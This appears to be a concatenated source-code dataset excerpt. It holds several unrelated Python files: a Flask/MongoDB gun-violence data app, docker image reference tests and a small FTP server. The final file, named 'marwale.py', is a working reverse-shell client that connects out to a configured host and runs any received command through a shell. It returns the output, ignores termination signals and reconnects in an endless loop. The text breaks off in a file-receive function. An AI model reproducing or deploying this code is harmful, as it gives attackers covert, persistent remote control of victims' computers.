# FIXME: Undefined variable 'PythonExpressionElement'
self._zero = PythonExpressionElement(0)
return self._zero
zero = property(_getZero, None, None, "additive unit.")
| 975 | 1,860 | 320 |
5cd80199edec3fb9faa21f7e2426eab3da37d240 | 73 | py | Python | code/MPGenPython/motion_profile/__init__.py | shuqinlee/PedestrianDetection | eb3353e8d22fb855f5a233dd4c468933ced91022 | [
"MIT"
] | 4 | 2018-03-17T13:44:33.000Z | 2018-12-28T02:59:28.000Z | code/MPGenPython/motion_profile/__init__.py | shuqinlee/PedestrianDetection | eb3353e8d22fb855f5a233dd4c468933ced91022 | [
"MIT"
] | null | null | null | code/MPGenPython/motion_profile/__init__.py | shuqinlee/PedestrianDetection | eb3353e8d22fb855f5a233dd4c468933ced91022 | [
"MIT"
] | null | null | null | # __init__: let python know this is a package
from mpgen import mpgen
| 18.25 | 46 | 0.753425 | # __init__: let python know this is a package
from mpgen import mpgen
| 0 | 0 | 0 |
ec565786d077cf1223be311832047f6026c29ef5 | 9,833 | py | Python | GunsApp/app.py | rabest265/Guns2 | dce211b2494d5a130fd706ff76646365d9ef3e57 | [
"CNRI-Python",
"OML"
] | null | null | null | GunsApp/app.py | rabest265/Guns2 | dce211b2494d5a130fd706ff76646365d9ef3e57 | [
"CNRI-Python",
"OML"
] | null | null | null | GunsApp/app.py | rabest265/Guns2 | dce211b2494d5a130fd706ff76646365d9ef3e57 | [
"CNRI-Python",
"OML"
] | null | null | null | from flask import Flask, render_template, redirect, jsonify
from flask_pymongo import PyMongo
from datetime import datetime
import json
import pandas as pd
import os
import numpy as np
import datetime
import csv
import pymongo
import request
# function to save dataframe to collection_name in MongoDB 'wines'
# In[2]:
# Load CSV file
csv_path = os.path.join('..',"rawdata", "gun-violence-data_01-2013_12-2015.csv")
# Read the first half of the gun violence file and store into Pandas data frame
gun_violence_df_2015 = pd.read_csv(csv_path, encoding = "ISO-8859-1")
gun_violence_df_2015.head()
# In[3]:
# Load CSV file
csv_path = os.path.join('..',"rawdata", "gun-violence-data_01-2016_03-2018.csv")
# Read the second half of the gun violence file and store into Pandas data frame
gun_violence_df_2018 = pd.read_csv(csv_path, encoding = "ISO-8859-1")
gun_violence_df_2018.head()
# In[4]:
# Recomine the two files
gun_violence_df= pd.concat([gun_violence_df_2015, gun_violence_df_2018])
gun_violence_df.head()
# In[5]:
# Convert the date field to date/time and removed unnecessary columns
gun_violence_df['date']= pd.to_datetime(gun_violence_df['date'])
gun_violence_df=gun_violence_df.loc[(gun_violence_df['date'] <'2018-01-01') & (gun_violence_df['date']>'2013-12-31') ]
gun_violence_df.drop(columns=['address', 'incident_url', 'incident_url_fields_missing', 'source_url', 'participant_name','sources', 'location_description','notes'], inplace=True, axis=1)
gun_violence_df.head()
# In[6]:
# Search the incident_characteristics for specific incident types and set that incident type to True
gun_violence_df["mass"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Mass Shooting", case=False, na=False), True, False)
gun_violence_df["gang"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Gang", case=False, na=False), True, False)
gun_violence_df["domestic"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Domestic Violence", case=False, na=False), True, False)
gun_violence_df["non-shooting"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Non-Shooting", case=False, na=False), True, False)
gun_violence_df["accidental"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Accidental", case=False, na=False), True, False)
gun_violence_df["prohibited"]=np.where(gun_violence_df['incident_characteristics'].str.contains("prohibited", case=False, na=False), True, False)
gun_violence_df['officer'] = np.where(gun_violence_df['incident_characteristics'].str.contains("Officer|TSA", case=False, na=False), True, False)
gun_violence_df.head()
# ## Load csv files into pandas dataframes, clean, save to mongo db
# In[7]:
# read in cities data
cities_path = os.path.join("..","Data","Cities.csv")
df_cities = pd.read_csv(cities_path, encoding="UTF-8")
df_cities.head()
# # save to/replace collection "cities" in "guns" mongo db
saveMongo(df_cities, "cities", replace=True)
# In[8]:
# read in state data
states_path = os.path.join("..","Data","States.csv")
df_states = pd.read_csv(states_path, encoding="UTF-8")
df_states = df_states[["state","census_2010","pop_estimate_2015","2015_median_income", "age18longgunpossess","age21longgunpossess","assault","mentalhealth","universal"]]
df_states.head()
# # save to/replace collection "states" in "guns" mongo db
saveMongo(df_states, "states", replace=True)
# In[12]:
# Loading gun violence
df_guns = gun_violence_df
df_guns = df_guns[["incident_id","date","state","city_or_county","n_killed","n_injured","incident_characteristics","latitude","longitude","mass","gang","domestic","non-shooting","accidental","prohibited","officer"]]
df_guns["n_involved"] = df_guns["n_killed"]+df_guns["n_injured"]
df_guns["year"]= pd.DatetimeIndex(df_guns['date']).year
# Create a column to record type of shooting
conditions = [
(df_guns["mass"]==1),
(df_guns["n_involved"] == 0),
(df_guns["n_killed"]==0)]
choices = ["mass shooting", "no injuries","injuries only"]
df_guns["shoot_type"] = np.select(conditions, choices, default="some dead")
df_guns.head()
# Add in state level data for filtering purposes
df_guns_complete = pd.merge(df_guns, df_states, on="state", how="left")
df_guns_complete["count"] = 1
df_guns_complete.head()
# save to/replace collection "guns" in "guns" mongo db
saveMongo(df_guns_complete, "guns", replace=True)
# In[10]:
summary_guns_df = df_guns_complete.groupby("shoot_type",as_index=False).sum()[["pop_estimate_2015"]]
summary_guns_df["shoot_type"] = df_guns_complete.groupby("shoot_type",as_index=False).first()["shoot_type"]
summary_guns_df["Count"] = df_guns_complete.groupby("shoot_type",as_index=False).sum()[["count"]]
summary_guns_df["n_killed"]= df_guns_complete.groupby("shoot_type",as_index=False).sum()[["n_killed"]]
summary_guns_df["Incidents_per_100M"] = summary_guns_df ["Count"]/summary_guns_df["pop_estimate_2015"]*100000000
summary_guns_df["Killed_per_100M"] = summary_guns_df ["n_killed"]/summary_guns_df["pop_estimate_2015"]*100000000
summary_guns_df.reset_index()
summary_guns_df.head()
# save to/replace collection "guns_summary" in "guns" mongo db
saveMongo(summary_guns_df, "guns_summary", replace=True)
# In[17]:
summary_states_df = df_guns_complete.groupby(["shoot_type","state"], as_index=False).sum()[["pop_estimate_2015"]]
summary_states_df["state"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["state"]
summary_states_df["shoot_type"] = df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["shoot_type"]
summary_states_df["Count"] = df_guns_complete.groupby(["shoot_type", "state"],as_index=False).sum()[["count"]]
summary_states_df["n_killed"]= df_guns_complete.groupby(["shoot_type","state"],as_index=False).sum()[["n_killed"]]
summary_states_df["Incidents_per_100M"] = summary_states_df ["Count"]/summary_states_df["pop_estimate_2015"]*100000000
summary_states_df["Killed_per_100M"] = summary_states_df ["n_killed"]/summary_states_df["pop_estimate_2015"]*100000000
summary_states_df["2015_median_income"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["2015_median_income"]
summary_states_df["age18longgunpossess"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["age18longgunpossess"]
summary_states_df["age21longgunpossess"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["age21longgunpossess"]
summary_states_df["assault"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["assault"]
summary_states_df["mentalhealth"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["mentalhealth"]
summary_states_df["universal"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["universal"]
summary_states_df.reset_index()
summary_states_df.head()
# save to/replace collection "state_summary" in "guns" mongo db
saveMongo(summary_states_df, "state_summary", replace=True)
s
# from bson.json_util import loads
# Create an instance of Flask
app = Flask(__name__)
# Use PyMongo to establish Mongo connection
mongo = PyMongo(app, uri="mongodb://localhost:27017/guns")
# Define shooting list
ShootList = ["mass shooting", "no injuries", "injuries only", "some dead"]
# ShootList = ["mass shooting"]
@app.route("/")
@app.route("/maps")
@app.route("/benchmark")
@app.route("/interactive_chart")
@app.route("/jsonifiedcities")
@app.route("/jsonifiedguns")
@app.route("/jsonifiedguns/<yr>")
@app.route("/jsonifiedstates")
@app.route("/jsonifiedsummary")
@app.route("/jsonifiedstatesummary")
if __name__ == "__main__":
app.run(debug=True)
| 35.243728 | 215 | 0.73711 | from flask import Flask, render_template, redirect, jsonify
from flask_pymongo import PyMongo
from datetime import datetime
import json
import pandas as pd
import os
import numpy as np
import datetime
import csv
import pymongo
import request
# function to save dataframe to collection_name in MongoDB 'wines'
def saveMongo(df, collection_name, replace=False):
mng_client = pymongo.MongoClient('localhost', 27017)
mng_db = mng_client['guns']
if replace:
mng_db[collection_name].drop()
db_cm = mng_db[collection_name]
data = df
data_json = json.loads(data.to_json(orient='records', date_unit='ns'))
#db_cm.delete_many()
db_cm.insert_many(data_json)
# In[2]:
# Load CSV file
csv_path = os.path.join('..',"rawdata", "gun-violence-data_01-2013_12-2015.csv")
# Read the first half of the gun violence file and store into Pandas data frame
gun_violence_df_2015 = pd.read_csv(csv_path, encoding = "ISO-8859-1")
gun_violence_df_2015.head()
# In[3]:
# Load CSV file
csv_path = os.path.join('..',"rawdata", "gun-violence-data_01-2016_03-2018.csv")
# Read the second half of the gun violence file and store into Pandas data frame
gun_violence_df_2018 = pd.read_csv(csv_path, encoding = "ISO-8859-1")
gun_violence_df_2018.head()
# In[4]:
# Recomine the two files
gun_violence_df= pd.concat([gun_violence_df_2015, gun_violence_df_2018])
gun_violence_df.head()
# In[5]:
# Convert the date field to date/time and removed unnecessary columns
gun_violence_df['date']= pd.to_datetime(gun_violence_df['date'])
gun_violence_df=gun_violence_df.loc[(gun_violence_df['date'] <'2018-01-01') & (gun_violence_df['date']>'2013-12-31') ]
gun_violence_df.drop(columns=['address', 'incident_url', 'incident_url_fields_missing', 'source_url', 'participant_name','sources', 'location_description','notes'], inplace=True, axis=1)
gun_violence_df.head()
# In[6]:
# Search the incident_characteristics for specific incident types and set that incident type to True
gun_violence_df["mass"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Mass Shooting", case=False, na=False), True, False)
gun_violence_df["gang"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Gang", case=False, na=False), True, False)
gun_violence_df["domestic"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Domestic Violence", case=False, na=False), True, False)
gun_violence_df["non-shooting"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Non-Shooting", case=False, na=False), True, False)
gun_violence_df["accidental"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Accidental", case=False, na=False), True, False)
gun_violence_df["prohibited"]=np.where(gun_violence_df['incident_characteristics'].str.contains("prohibited", case=False, na=False), True, False)
gun_violence_df['officer'] = np.where(gun_violence_df['incident_characteristics'].str.contains("Officer|TSA", case=False, na=False), True, False)
gun_violence_df.head()
# ## Load csv files into pandas dataframes, clean, save to mongo db
# In[7]:
# read in cities data
cities_path = os.path.join("..","Data","Cities.csv")
df_cities = pd.read_csv(cities_path, encoding="UTF-8")
df_cities.head()
# # save to/replace collection "cities" in "guns" mongo db
saveMongo(df_cities, "cities", replace=True)
# In[8]:
# read in state data
states_path = os.path.join("..","Data","States.csv")
df_states = pd.read_csv(states_path, encoding="UTF-8")
df_states = df_states[["state","census_2010","pop_estimate_2015","2015_median_income", "age18longgunpossess","age21longgunpossess","assault","mentalhealth","universal"]]
df_states.head()
# # save to/replace collection "states" in "guns" mongo db
saveMongo(df_states, "states", replace=True)
# In[12]:
# Loading gun violence
df_guns = gun_violence_df
df_guns = df_guns[["incident_id","date","state","city_or_county","n_killed","n_injured","incident_characteristics","latitude","longitude","mass","gang","domestic","non-shooting","accidental","prohibited","officer"]]
df_guns["n_involved"] = df_guns["n_killed"]+df_guns["n_injured"]
df_guns["year"]= pd.DatetimeIndex(df_guns['date']).year
# Create a column to record type of shooting
conditions = [
(df_guns["mass"]==1),
(df_guns["n_involved"] == 0),
(df_guns["n_killed"]==0)]
choices = ["mass shooting", "no injuries","injuries only"]
df_guns["shoot_type"] = np.select(conditions, choices, default="some dead")
df_guns.head()
# Add in state level data for filtering purposes
df_guns_complete = pd.merge(df_guns, df_states, on="state", how="left")
df_guns_complete["count"] = 1
df_guns_complete.head()
# save to/replace collection "guns" in "guns" mongo db
saveMongo(df_guns_complete, "guns", replace=True)
# In[10]:
summary_guns_df = df_guns_complete.groupby("shoot_type",as_index=False).sum()[["pop_estimate_2015"]]
summary_guns_df["shoot_type"] = df_guns_complete.groupby("shoot_type",as_index=False).first()["shoot_type"]
summary_guns_df["Count"] = df_guns_complete.groupby("shoot_type",as_index=False).sum()[["count"]]
summary_guns_df["n_killed"]= df_guns_complete.groupby("shoot_type",as_index=False).sum()[["n_killed"]]
summary_guns_df["Incidents_per_100M"] = summary_guns_df ["Count"]/summary_guns_df["pop_estimate_2015"]*100000000
summary_guns_df["Killed_per_100M"] = summary_guns_df ["n_killed"]/summary_guns_df["pop_estimate_2015"]*100000000
summary_guns_df.reset_index()
summary_guns_df.head()
# save to/replace collection "guns_summary" in "guns" mongo db
saveMongo(summary_guns_df, "guns_summary", replace=True)
# In[17]:
summary_states_df = df_guns_complete.groupby(["shoot_type","state"], as_index=False).sum()[["pop_estimate_2015"]]
summary_states_df["state"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["state"]
summary_states_df["shoot_type"] = df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["shoot_type"]
summary_states_df["Count"] = df_guns_complete.groupby(["shoot_type", "state"],as_index=False).sum()[["count"]]
summary_states_df["n_killed"]= df_guns_complete.groupby(["shoot_type","state"],as_index=False).sum()[["n_killed"]]
summary_states_df["Incidents_per_100M"] = summary_states_df ["Count"]/summary_states_df["pop_estimate_2015"]*100000000
summary_states_df["Killed_per_100M"] = summary_states_df ["n_killed"]/summary_states_df["pop_estimate_2015"]*100000000
summary_states_df["2015_median_income"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["2015_median_income"]
summary_states_df["age18longgunpossess"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["age18longgunpossess"]
summary_states_df["age21longgunpossess"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["age21longgunpossess"]
summary_states_df["assault"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["assault"]
summary_states_df["mentalhealth"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["mentalhealth"]
summary_states_df["universal"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["universal"]
summary_states_df.reset_index()
summary_states_df.head()
# save to/replace collection "state_summary" in "guns" mongo db
saveMongo(summary_states_df, "state_summary", replace=True)
s
# from bson.json_util import loads
# Create an instance of Flask
app = Flask(__name__)
# Use PyMongo to establish Mongo connection
mongo = PyMongo(app, uri="mongodb://localhost:27017/guns")
# Define shooting list
ShootList = ["mass shooting", "no injuries", "injuries only", "some dead"]
# ShootList = ["mass shooting"]
@app.route("/")
def home():
return render_template("index.html", ShootList = ShootList)
@app.route("/maps")
def charts():
return render_template("maps.html", ShootList = ShootList)
@app.route("/benchmark")
def bench():
return render_template("benchmark.html", ShootList = ShootList)
@app.route("/interactive_chart")
def intercharts():
return render_template("interactive_chart.html", ShootList = ShootList)
@app.route("/jsonifiedcities")
def jsonifiedcities():
citylist = []
cityinfo = mongo.db.cities.find()
for city in cityinfo:
del city["_id"]
citylist.append(city)
return jsonify(citylist)
@app.route("/jsonifiedguns")
def jsonifiedguns():
gunlist = []
guninfo = mongo.db.guns.find()
for gun in guninfo:
del gun["_id"]
if gun["shoot_type"] in ShootList:
gunlist.append(gun)
return jsonify(gunlist)
@app.route("/jsonifiedguns/<yr>")
def jsonifiedgunsy(yr):
gunlist = []
guninfo = mongo.db.guns.find({ "year": int(yr) })
#guninfo = mongo.db.guns.find()
for gun in guninfo:
del gun["_id"]
if gun["shoot_type"] in ShootList:
gunlist.append(gun)
print(len(gunlist))
return jsonify(gunlist)
@app.route("/jsonifiedstates")
def jsonifiedstates():
statelist = []
stateinfo = mongo.db.states.find()
for state in stateinfo:
del state["_id"]
statelist.append(state)
return jsonify(statelist)
@app.route("/jsonifiedsummary")
def jsonifiedsummary():
summarylist = []
summaryinfo = mongo.db.guns_summary.find()
for shoot_type in summaryinfo:
del shoot_type["_id"]
summarylist.append(shoot_type)
return jsonify(summarylist)
@app.route("/jsonifiedstatesummary")
def jsonifiedstatesummary():
statesummarylist = []
statesummaryinfo = mongo.db.state_summary.find()
for shoot_type in statesummaryinfo:
del shoot_type["_id"]
statesummarylist.append(shoot_type)
return jsonify(statesummarylist)
if __name__ == "__main__":
app.run(debug=True)
| 1,880 | 0 | 242 |
97786e7328a0171fd55f09db622f3afa0975d1e7 | 11,555 | py | Python | tests/test_reference.py | novirium/docker-image-py | cf4eb19e6fe983b58b10b70816fe1ed02c9e7f09 | [
"Apache-2.0"
] | 17 | 2017-02-25T13:59:22.000Z | 2022-03-23T07:37:46.000Z | tests/test_reference.py | novirium/docker-image-py | cf4eb19e6fe983b58b10b70816fe1ed02c9e7f09 | [
"Apache-2.0"
] | 7 | 2019-03-01T06:07:44.000Z | 2021-07-27T03:15:33.000Z | tests/test_reference.py | novirium/docker-image-py | cf4eb19e6fe983b58b10b70816fe1ed02c9e7f09 | [
"Apache-2.0"
] | 6 | 2018-12-16T22:15:19.000Z | 2022-03-30T06:35:40.000Z | import unittest
from docker_image import digest
from docker_image import reference
| 49.806034 | 293 | 0.586672 | import unittest
from docker_image import digest
from docker_image import reference
class TestReference(unittest.TestCase):
def test_reference(self):
def create_test_case(input_, err=None, repository=None, hostname=None, tag=None, digest=None):
return {
'input': input_,
'err': err,
'repository': repository,
'hostname': hostname,
'tag': tag,
'digest': digest,
}
test_cases = [
create_test_case(input_='test_com', repository='test_com'),
create_test_case(input_='test.com:tag', repository='test.com', tag='tag'),
create_test_case(input_='test.com:5000', repository='test.com', tag='5000'),
create_test_case(input_='test.com/repo:tag', repository='test.com/repo', hostname='test.com', tag='tag'),
create_test_case(input_='test:5000/repo', repository='test:5000/repo', hostname='test:5000'),
create_test_case(input_='test:5000/repo:tag', repository='test:5000/repo', hostname='test:5000', tag='tag'),
create_test_case(input_='test:5000/repo@sha256:{}'.format('f' * 64),
repository='test:5000/repo', hostname='test:5000', digest='sha256:{}'.format('f' * 64)),
create_test_case(input_='test:5000/repo:tag@sha256:{}'.format('f' * 64),
repository='test:5000/repo', hostname='test:5000', tag='tag', digest='sha256:{}'.format('f' * 64)),
create_test_case(input_='test:5000/repo', repository='test:5000/repo', hostname='test:5000'),
create_test_case(input_='', err=reference.NameEmpty),
create_test_case(input_=':justtag', err=reference.ReferenceInvalidFormat),
create_test_case(input_='@sha256:{}'.format('f' * 64), err=reference.ReferenceInvalidFormat),
create_test_case(input_='repo@sha256:{}'.format('f' * 34), err=digest.DigestInvalidLength),
create_test_case(input_='validname@invaliddigest:{}'.format('f' * 64), err=digest.DigestUnsupported),
create_test_case(input_='{}a:tag'.format('a/' * 128), err=reference.NameTooLong),
create_test_case(input_='{}a:tag-puts-this-over-max'.format('a/' * 127), repository='{}a'.format('a/' * 127),
hostname='a', tag='tag-puts-this-over-max'),
create_test_case(input_='aa/asdf$$^/aa', err=reference.ReferenceInvalidFormat),
create_test_case(input_='sub-dom1.foo.com/bar/baz/quux', repository='sub-dom1.foo.com/bar/baz/quux',
hostname='sub-dom1.foo.com'),
create_test_case(input_='sub-dom1.foo.com/bar/baz/quux:some-long-tag', repository='sub-dom1.foo.com/bar/baz/quux',
hostname='sub-dom1.foo.com', tag='some-long-tag'),
create_test_case(input_='b.gcr.io/test.example.com/my-app:test.example.com',
repository='b.gcr.io/test.example.com/my-app', hostname='b.gcr.io', tag='test.example.com'),
create_test_case(input_='xn--n3h.com/myimage:xn--n3h.com', repository='xn--n3h.com/myimage', hostname='xn--n3h.com',
tag='xn--n3h.com'),
create_test_case(input_='xn--7o8h.com/myimage:xn--7o8h.com@sha512:{}'.format('f' * 128),
repository='xn--7o8h.com/myimage', hostname='xn--7o8h.com', tag='xn--7o8h.com',
digest='sha512:{}'.format('f' * 128)),
create_test_case(input_='foo_bar.com:8080', repository='foo_bar.com', tag='8080'),
create_test_case(input_='foo/foo_bar.com:8080', repository='foo/foo_bar.com', hostname='foo', tag='8080'),
create_test_case(input_='123.dkr.ecr.eu-west-1.amazonaws.com:lol/abc:d', err=reference.ReferenceInvalidFormat),
]
for tc in test_cases:
if tc['err']:
self.assertRaises(tc['err'], reference.Reference.parse, tc['input'])
continue
try:
r = reference.Reference.parse(tc['input'])
except Exception as e:
raise e
else:
if tc['repository']:
self.assertEqual(tc['repository'], r['name'])
if tc['hostname']:
hostname, _ = r.split_hostname()
self.assertEqual(tc['hostname'], hostname)
if tc['tag']:
self.assertEqual(tc['tag'], r['tag'])
if tc['digest']:
self.assertEqual(tc['digest'], r['digest'])
class TestNormalize(unittest.TestCase):
def test_parse_repository_info(self):
def create_test_case(remote_name, familiar_name, full_name, ambiguous_name, domain):
return {
'remote_name': remote_name,
'familiar_name': familiar_name,
'full_name': full_name,
'ambiguous_name': ambiguous_name,
'domain': domain,
}
test_cases = [
create_test_case('fooo/bar', 'fooo/bar', 'docker.io/fooo/bar', 'index.docker.io/fooo/bar', 'docker.io'),
create_test_case('library/ubuntu', 'ubuntu', 'docker.io/library/ubuntu', 'library/ubuntu', 'docker.io'),
create_test_case('nonlibrary/ubuntu', 'nonlibrary/ubuntu', 'docker.io/nonlibrary/ubuntu', '', 'docker.io'),
create_test_case('other/library', 'other/library', 'docker.io/other/library', '', 'docker.io'),
create_test_case('private/moonbase', '127.0.0.1:8000/private/moonbase', '127.0.0.1:8000/private/moonbase', '',
'127.0.0.1:8000'),
create_test_case('privatebase', '127.0.0.1:8000/privatebase', '127.0.0.1:8000/privatebase', '', '127.0.0.1:8000'),
create_test_case('private/moonbase', 'example.com/private/moonbase', 'example.com/private/moonbase', '',
'example.com'),
create_test_case('privatebase', 'example.com/privatebase', 'example.com/privatebase', '', 'example.com'),
create_test_case('private/moonbase', 'example.com:8000/private/moonbase', 'example.com:8000/private/moonbase', '',
'example.com:8000'),
create_test_case('privatebasee', 'example.com:8000/privatebasee', 'example.com:8000/privatebasee', '',
'example.com:8000'),
create_test_case('library/ubuntu-12.04-base', 'ubuntu-12.04-base', 'docker.io/library/ubuntu-12.04-base',
'index.docker.io/library/ubuntu-12.04-base', 'docker.io'),
create_test_case('library/foo', 'foo', 'docker.io/library/foo', 'docker.io/foo', 'docker.io'),
create_test_case('library/foo/bar', 'library/foo/bar', 'docker.io/library/foo/bar', '', 'docker.io'),
create_test_case('store/foo/bar', 'store/foo/bar', 'docker.io/store/foo/bar', '', 'docker.io'),
]
for tc in test_cases:
ref_strings = [tc['familiar_name'], tc['full_name']]
if tc['ambiguous_name'] != '':
ref_strings.append(tc['ambiguous_name'])
refs = []
for r in ref_strings:
try:
named = reference.Reference.parse_normalized_named(r)
except Exception as e:
raise e
refs.append(named)
for r in refs:
self.assertEqual(tc['familiar_name'], r.familiar_name())
self.assertEqual(tc['full_name'], r.string())
self.assertEqual(tc['domain'], r.domain())
self.assertEqual(tc['remote_name'], r.path())
def test_validate_reference_name(self):
valid_repo_names = [
"docker/docker",
"library/debian",
"debian",
"docker.io/docker/docker",
"docker.io/library/debian",
"docker.io/debian",
"index.docker.io/docker/docker",
"index.docker.io/library/debian",
"index.docker.io/debian",
"127.0.0.1:5000/docker/docker",
"127.0.0.1:5000/library/debian",
"127.0.0.1:5000/debian",
"thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev",
# This test case was moved from invalid to valid since it is valid input
# when specified with a hostname, it removes the ambiguity from about
# whether the value is an identifier or repository name
"docker.io/1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a",
]
invalid_repo_names = [
"https://github.com/docker/docker",
"docker/Docker",
"-docker",
"-docker/docker",
"-docker.io/docker/docker",
"docker///docker",
"docker.io/docker/Docker",
"docker.io/docker///docker",
"1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a",
]
for name in valid_repo_names:
ref = reference.Reference.parse_normalized_named(name)
self.assertIsNotNone(ref)
for name in invalid_repo_names:
self.assertRaises(reference.InvalidReference, reference.Reference.parse_normalized_named, name)
def test_validate_remote_name(self):
valid_repository_names = [
# Sanity check.
"docker/docker",
# Allow 64-character non-hexadecimal names (hexadecimal names are forbidden).
"thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev",
# Allow embedded hyphens.
"docker-rules/docker",
# Allow multiple hyphens as well.
"docker---rules/docker",
# Username doc and image name docker being tested.
"doc/docker",
# single character names are now allowed.
"d/docker",
"jess/t",
# Consecutive underscores.
"dock__er/docker",
]
invalid_repository_names = [
# Disallow capital letters.
"docker/Docker",
# Only allow one slash.
"docker///docker",
# Disallow 64-character hexadecimal.
"1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a",
# Disallow leading and trailing hyphens in namespace.
"-docker/docker",
"docker-/docker",
"-docker-/docker",
# Don't allow underscores everywhere (as opposed to hyphens).
"____/____",
"_docker/_docker",
# Disallow consecutive periods.
"dock..er/docker",
"dock_.er/docker",
"dock-.er/docker",
# No repository.
"docker/",
# namespace too long
"this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255/docker",
]
for name in valid_repository_names:
ref = reference.Reference.parse_normalized_named(name)
self.assertIsNotNone(ref)
for name in invalid_repository_names:
self.assertRaises(reference.InvalidReference, reference.Reference.parse_normalized_named, name)
| 11,281 | 36 | 152 |
1a21cf24460bf429e80572cc953d2defbc5d68f5 | 621 | py | Python | ftpserver.py | miebach/py-simple-ftpd | 8e02091a906fee342252a146054d5418db687303 | [
"MIT"
] | 5 | 2015-02-21T00:00:23.000Z | 2020-05-07T04:21:03.000Z | ftpserver.py | miebach/py-simple-ftpd | 8e02091a906fee342252a146054d5418db687303 | [
"MIT"
] | null | null | null | ftpserver.py | miebach/py-simple-ftpd | 8e02091a906fee342252a146054d5418db687303 | [
"MIT"
] | null | null | null | import time
import sha
from pyftpdlib import ftpserver
username="user"
authorizer = ftpserver.DummyAuthorizer()
password = mysha((str(time.time()) + "babble"))[:7]
print "user:",username
print "password:",password
authorizer.add_user(username, password, "./data", perm="elradfmw")
#authorizer.add_anonymous(".")
ftp_handler = ftpserver.FTPHandler
ftp_handler.authorizer = authorizer
#address = ("127.0.0.1", 21) # listen only on localhost
address = ("", 21) # listen on all interfaces
ftpd = ftpserver.FTPServer(address, ftp_handler)
ftpd.serve_forever() | 23.884615 | 66 | 0.73752 | import time
import sha
from pyftpdlib import ftpserver
def mysha(x):
hash = sha.new(x)
return hash.hexdigest()
username="user"
authorizer = ftpserver.DummyAuthorizer()
password = mysha((str(time.time()) + "babble"))[:7]
print "user:",username
print "password:",password
authorizer.add_user(username, password, "./data", perm="elradfmw")
#authorizer.add_anonymous(".")
ftp_handler = ftpserver.FTPHandler
ftp_handler.authorizer = authorizer
#address = ("127.0.0.1", 21) # listen only on localhost
address = ("", 21) # listen on all interfaces
ftpd = ftpserver.FTPServer(address, ftp_handler)
ftpd.serve_forever() | 38 | 0 | 23 |
0a54a78b31e4be5894fa62d3e6f6f46c9905bd24 | 4,037 | py | Python | Creator/macOS/marwale.py | rohitnishad613/Glitch | 4f896d85f3de3c98e5c91823ae3a87c4d8fdc97f | [
"MIT"
] | 5 | 2020-09-16T06:27:12.000Z | 2020-09-21T11:14:14.000Z | Creator/macOS/marwale.py | rohitnishad613/Glitch | 4f896d85f3de3c98e5c91823ae3a87c4d8fdc97f | [
"MIT"
] | null | null | null | Creator/macOS/marwale.py | rohitnishad613/Glitch | 4f896d85f3de3c98e5c91823ae3a87c4d8fdc97f | [
"MIT"
] | null | null | null | import os
import socket
import subprocess
import time
import signal
import sys
import struct
while True:
time.sleep(0.1)
main()
| 29.903704 | 116 | 0.489225 | import os
import socket
import subprocess
import time
import signal
import sys
import struct
class Client(object):
def __init__(self):
HERE_IS_YOUR_HOST_AND_PORT
self.socket = None
def register_signal_handler(self):
signal.signal(signal.SIGINT, self.do_notting)
signal.signal(signal.SIGTERM, self.do_notting)
return
def do_notting(self, signal=None, frame=None):
return
def socket_create(self):
try:
self.socket = socket.socket()
except socket.error as e:
return
return
def socket_connect(self):
try:
self.socket.connect((self.serverHost, self.serverPort))
# self.socket.setblocking(1)
except socket.error as e:
time.sleep(5)
raise
try:
self.socket.send(socket.gethostname().encode('utf-8'))
except socket.error as e:
raise
return
def receive_commands(self):
cwd = (os.getcwd() + '> ').encode('utf-8')
self.socket.send(struct.pack('>I', len(cwd)) + cwd)
while True:
output_str = None
data = self.socket.recv(20480)
if data == b'':
break
elif data[:2].decode("utf-8") == 'cd':
directory = data[3:].decode("utf-8")
try:
os.chdir(directory.strip())
except Exception as e:
output_str = "Could not change directory: " + str(e) + "\n"
else:
output_str = ""
elif data[:].decode("utf-8") == 'exit':
return
elif len(data) > 0:
try:
cmd = subprocess.Popen(data[:].decode(
"utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output_bytes = cmd.stdout.read() + cmd.stderr.read()
output_str = output_bytes.decode(
"utf-8", errors="replace")
except Exception as e:
output_str = "Command execution unsuccessful: " + \
str(e) + "\n"
if output_str is not None:
sent_message = (output_str + os.getcwd() +
'> ').encode('utf-8')
try:
self.socket.send(struct.pack(
'>I', len(sent_message)) + sent_message)
except Exception as e:
return
return
def receive_file(self):
fileinfo = self.socket.recv(1024).decode('utf-8')
